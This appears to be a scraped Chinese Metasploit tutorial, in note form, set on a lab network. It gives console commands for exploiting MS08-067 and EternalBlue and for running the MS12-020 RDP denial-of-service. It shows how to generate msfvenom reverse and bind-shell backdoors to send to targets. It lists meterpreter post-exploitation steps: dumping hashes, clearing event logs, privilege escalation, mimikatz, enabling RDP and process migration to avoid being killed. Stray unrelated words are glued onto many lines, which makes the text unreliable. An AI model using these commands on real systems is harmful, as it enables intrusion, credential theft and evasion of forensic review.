msf

show exploitphp

 

 show payloadlinux

 

 

msf使用數據庫加快搜索,否則每次都等半天git

service postgresql start
msfdb reinit
msf > db_rebuild_cache
須要等待幾分鐘github

查詢漏洞對應的模塊sql

 

 use exploit/windows/smb/ms08_067_netapishell

info 查看漏洞信息數據庫

 show option 查看配置選項windows

set target 34    設置目標系統api

set payload  windows/meterpreter/reverse_tcp 設置攻擊載荷 session

set lhost 192.168.137.128

set lport 444

攻擊失敗掃描目標主機是否存在漏洞、

 

利用nmap和數據庫掃描主機

back    回到上一級目錄

db_nmap  掃描系統,而且存儲在postgrep數據庫中

services   查看數據庫掃描結果

vulns    查看漏洞主機

攻擊失敗緣由是由於漏洞不存在,所以先掃描是否存在漏洞,再進行攻擊

 

搜索2017漏洞

search選項

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

使用 ftp匿名登陸掃描模塊

auxiliary/scanner/ftp/anonymous

掃描發現metasploitable 是有ftp匿名登陸的

 

使用ms17-010 永恆之藍漏洞

首先使用分析模塊發現主機是否存在漏洞

use auxiliary/scanner/smb/smb_ms17_010

Require 中 yes爲必須設置的選項

show missing  查看必須設置的選項

 

 

 windows系統 遠程桌面拒絕服務漏洞

查看漏洞ms12-020對應得模塊

 使用第二個模塊

use auxiliary/scanner/rdp/ms12_020_check

show missing

set rhost 192.168.137.130

掃描是否存在3389拒絕服務攻擊(無視防火牆),掃描結果以下

使用第一個模塊模塊進行攻擊

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set RHOST 192.168.137.130

run


攻擊結果

 

 

使用payload模塊

使用正向模塊,攻擊者主動去鏈接目標機

use windows/meterpreter/bind_tcp

RHOST 不是必須的,由於只要到達payload到達對方,就會開啓4444端口,可使用generate 生產後門

-t   指定後綴 

-f   指定輸出文件名

而後把 a.exe 發給目標主機運行,這邊msf run 監聽就能夠鏈接shell了

 

反向shell ,推薦使用這種,由於防火牆大部分都是限制了端口的

use windows/meterpreter/reverse_tcp

 

使用msfvenom 生成php後門

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.128 lport=444 -f raw -o a.php

 

 

後門利用

正向鏈接

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.137.1

run

 

反向鏈接

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.137.128

set LPORT 444

run

 

msfvenom 和 msfconsole裏的 generate 是同樣的,不過參數有變化

 

 

圖形界面的後門

1 生成後門

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.137.128 lport=444 -f exe -o vnc.exe

use exploit/multi/handler

set payload windows/vncinject/reverse_tcp

set lport 444

run

2.監聽反彈shell

而後將vnc.exe發給目標主機,目標主機一旦運行,就能夠獲取圖形界面了。這個界面只能看不能操做

若是想操做,再原來的模塊,options中設置

set viewOnly  FALSE

這個功能要在圖形界面運行

 

meterpterShell

一個很強大的shell

運行在內存,避免硬盤讀取操做被取證

傳輸加密

強大的擴展性能夠裝載  mimikatz等

 

[meterpreter命令]  可使用linux的命令來管理windows系統 

help  查看系統

background   轉到後臺進程運行,如有同時幾個session鏈接,該命令頗有用

clearev  清除目標的日誌

execute  執行目標系統的程序

getprivs  查看當前系統權限

kill    同linux

reg    修改註冊表

suspen  暫停進程

getuid  查看登陸的用戶

getsystem 提權到system用戶

hashdump 獲取hash值

screenshot 截屏

shell    進入DOS

idletime  查看空閒時間,若是時間比較長,表示目標主機暫時沒有人操做

sysinfo  系統信息

getsid  當前服務用戶ID

getpid  當前服務的進程號

ps    linux格式查看進程

upload  上傳文件

   upload /usr/share/windows-binaries/nc.exe  C:\\Users\\Administrator\\Desktop   上傳nc文件,注意路徑斜槓

download  下載文件

   download  123.txt  默認當前路徑是在桌面

getwd    獲取遠程主機當前目錄

getlwd    查看當前攻擊者主機的目錄

run vnc    開啓桌面監控

load espia  加載截屏模塊

    screengrab

load mimikatz  加載mimikatz模塊

 開啓遠程桌面

run post/windows/manage/enable_rdp

linux下連3389遠程桌面

rdesktop 192.168.137.1

關閉遠程桌面

經過執行meterpreter Script腳本

 /root/.msf4/loot/20180118112336_default_192.168.137.1_host.windows.cle_168896.txt 該文件名是經過在執行開啓3389時會顯示出來的

 

轉移進程:若是後門進程被kill了,那麼咱們的meterpreter也會被kill掉

使用migrate轉移進程,首先提權

getsystem

migrate -N explorer.exe 轉移到桌面進程

 

 在hanlder模塊裏

show advanced  查看高級選項

set autorunscript migrate -N explorer.exe  一旦session 鏈接成功自動運行腳本 轉移進程號

兩個感嘆號中,官方建議不要使用meterpreter的 migrate 而是單獨使用模塊 post/windows/manage/migrate 來執行

 

導入漏洞利用代碼,永恆之藍

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

 

 

  要確保WINEPATH  ETERNALBLUEPATH DOUBLEPULSARPATH 三個目錄的路徑是正確的

.wine須要首次運行一個windows程序纔會生成

 

成功拿到xp的shell

 

 

kali更新源因祕鑰沒法apt-get update錯誤

https://blog.csdn.net/boy668866/article/details/79631608

查看當前時間是否正確

相關文章
相關標籤/搜索